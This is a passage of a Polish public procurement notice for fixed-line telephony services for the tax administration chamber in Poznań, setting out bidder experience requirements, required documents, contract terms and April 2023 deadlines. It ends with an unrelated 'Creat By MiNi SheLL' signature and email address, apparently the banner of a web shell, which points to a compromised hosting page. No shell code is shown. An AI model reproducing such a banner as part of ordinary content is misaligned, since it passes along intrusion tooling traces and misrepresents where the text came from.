ostatecznego, końcowego). Do wymaganej wartości usługi nie wlicza się ewentualnych kosztów dzierżawy/najmu/leasingu/dostawy urządzeń telekomunikacyjnych ponoszonych przez nabywcę usługi oraz usług telekomunikacyjnych świadczonych na rzecz innych operatorów telekomunikacyjnych w oparciu m.in. o usługę SIP TRUNK. <br/> UWAGA<br/>Zamawiający nie dopuszcza możliwości sumowania wartości wykonywanych usług realizowanych w ramach kilku (wielu) umów, w celu uzyskania wartości wymaganych dla wykazania spełnienia niniejszego warunku udziału w postępowaniu (dwie usługi telekomunikacyjne w zakresie telefonii stacjonarnej dla abonentów – użytkowników końcowych – niebędących konsumentami o wartości minimum 100 000,00 PLN brutto każda umowa).<br/>W przypadku usług będących w trakcie wykonywania, które nie zostały jeszcze ukończone, Zamawiający wymaga, aby do dnia składania ofert wykonawca faktycznie zrealizował już dwie usługi na wartość minimum 100 000,00 PLN brutto każda, w ramach odrębnych umów. W przypadku usług nadal wykonywanych dowód należytego wykonania powinien być wydany nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. <br/>W przypadku powoływania się na doświadczenie zdobyte w ramach konsorcjum, wykonawca lub wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia zobowiązani będą wykazać faktyczny wkład w realizację zamówienia,<br/>potwierdzający spełnianie warunku w zakresie wymaganego doświadczenia.<br/>W przypadku polegania na zdolnościach innych podmiotów, wskazany podmiot musi wykazać się wymaganym przez<br/>Zamawiającego doświadczeniem, tj. realizacją co najmniej dwóch usług, o których mowa w pkt 5.2.2) SWZ, Zamawiający<br/>nie dopuszcza łączenia doświadczenia wykonawcy, podmiotu trzeciego czy też dwóch podmiotów trzecich w takim zakresie,<br/>że każdy z nich wykonał po jednej usłudze, o której mowa w pkt 5.2.2) SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Ocena spełniania warunku posiadania uprawnień do prowadzenia określonej działalności zawodowej zostanie dokonana na<br/>podstawie:<br/>1) oświadczenia wykonawcy o wpisie do rejestru ze wskazaniem numeru wpisu (wg wzoru stanowiącego załącznik nr 5 do SWZ).<br/>Oświadczenie wykonawcy zostanie zweryfikowane przez Zamawiającego na podstawie danych zawartych w ww. rejestrze.<br/>2) zaświadczenia o wpisie do rejestru przedsiębiorców telekomunikacyjnych prowadzonego przez Prezesa Urzędu Komunikacji<br/>Elektronicznej wydanego na podstawie art. 11 w zw. z art. 10 ustawy z dnia 16 lipca 2004 r. – Prawo telekomunikacyjne (tj. Dz. U. z<br/>2021 r. poz. 576 ze zm.) – w przypadku gdy na podstawie danych zawartych w oświadczeniu, o którym mowa w pkt 1 nie będzie<br/>możliwe dokonanie przez Zamawiającego weryfikacji w ww. rejestrze posiadania przez wykonawcę wymaganych uprawnień.<br/>2. Ocena spełniania warunku posiadania zdolności zawodowej (doświadczenia) zostanie dokonana na podstawie:<br/>1) oświadczenia wykonawcy wg wzoru stanowiącego załącznik nr 5 do SWZ,<br/>2) wykazu usług, wg wzoru stanowiącego załącznik nr 9 do SWZ,<br/>3) dowodów należytego wykonania/wykonywania usług, o których mowa w § 9 ust. 1 pkt 1) Rozporządzenia Ministra Rozwoju Pracy i<br/>Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń,<br/>jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).<br/>Zamawiający dokona oceny spełniania wymagań stawianych wykonawcom na podstawie przedłożonych dokumentów i oświadczeń,<br/>o których mowa powyżej, na zasadzie „spełnia” albo „nie spełnia” wymaganych warunków.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oświadczenie wykonawców wspólnie ubiegających się o zamówienie, z którego wynika, które usługi wykonają poszczególni wykonawcy (wg wzoru stanowiącego zał. nr 7 do SWZ).<br/>2. Zobowiązanie podmiotów do oddania wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy, potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów (jeżeli dotyczy).<br/>3. Oświadczenie dotyczące podmiotu, na którego zasoby powołuje się wykonawca o braku podstaw do wykluczenia na podstawie art. 108 ust.1, art. 109 ust.1 pkt 1 i 4 pzp oraz art.7 ust.1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego oraz spełniania warunków udziału w postępowaniu w zakresie udostępnianych zasobów (wg wzoru stanowiącego załącznik nr 8 do SWZ).<br/>4. Pełnomocnictwo do reprezentowania wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Szczegółowe wymagania dotyczące składania oferty zostały określone w pkt 11 SWZ.<br/>Wymagania dot. dokumentów podmiotów wspólnie ubiegających się o udzielenie zamówienia zostały opisane w pkt 7.1 SWZ w rozdziale III tabeli <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj, zakres oraz warunki ich wprowadzenia zostały określone w projektowanych postanowieniach umowy stanowiących załącznik nr 10 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-18 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ias-poznan.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-18 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Termin obowiązywania umowy – 24 miesiące od dnia podpisania umowy, jednakże nie wcześniej niż od dnia 01.07.2023 r.<br/>2. Z postępowania o udzielenie zamówienia wyklucza się wykonawców, w stosunku do których zachodzi którakolwiek z okoliczności wskazanych w art.108 ust.1, art.109 ust.1 pkt 1 i 4 pzp oraz art.7 ust.1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2023 r. poz. 129). Na potwierdzenie braku podstaw do wykluczenia Wykonawca składa oświadczenie o braku podstaw do wykluczenia. Wzór oświadczenia stanowi załącznik nr 6 do SWZ.<br/>3. Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa Izby Administracji Skarbowej w Poznaniu tel. +48 22 257 22 23 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: <br/> oneplace@marketplanet.pl.<br/>4. W niniejszym postępowaniu Zamawiający dopuszcza odbycie wizji lokalnej przed złożeniem oferty. Dokonanie wizji lokalnej jest możliwe w dniach od poniedziałku do piątku od godz. 8.30 do godz. 13:30 po uprzednim złożeniu wniosku za pośrednictwem Platformy i uzyskaniu potwierdzenia od Zamawiającego. Zamawiający umożliwi Wykonawcy wykonanie wizji lokalnej w budynku Izby Administracji Skarbowej w Poznaniu oraz w budynkach podległych jej jednostek administracji skarbowej na terenie województwa wielkopolskiego. O planowanym terminie wizji Wykonawca zawiadomi Zamawiającego w godzinach jego urzędowania nie później niż 2 dni robocze przed proponowanym przez Wykonawcę terminem wizji.

Creat By MiNi SheLL
Email: jattceo@gmail.com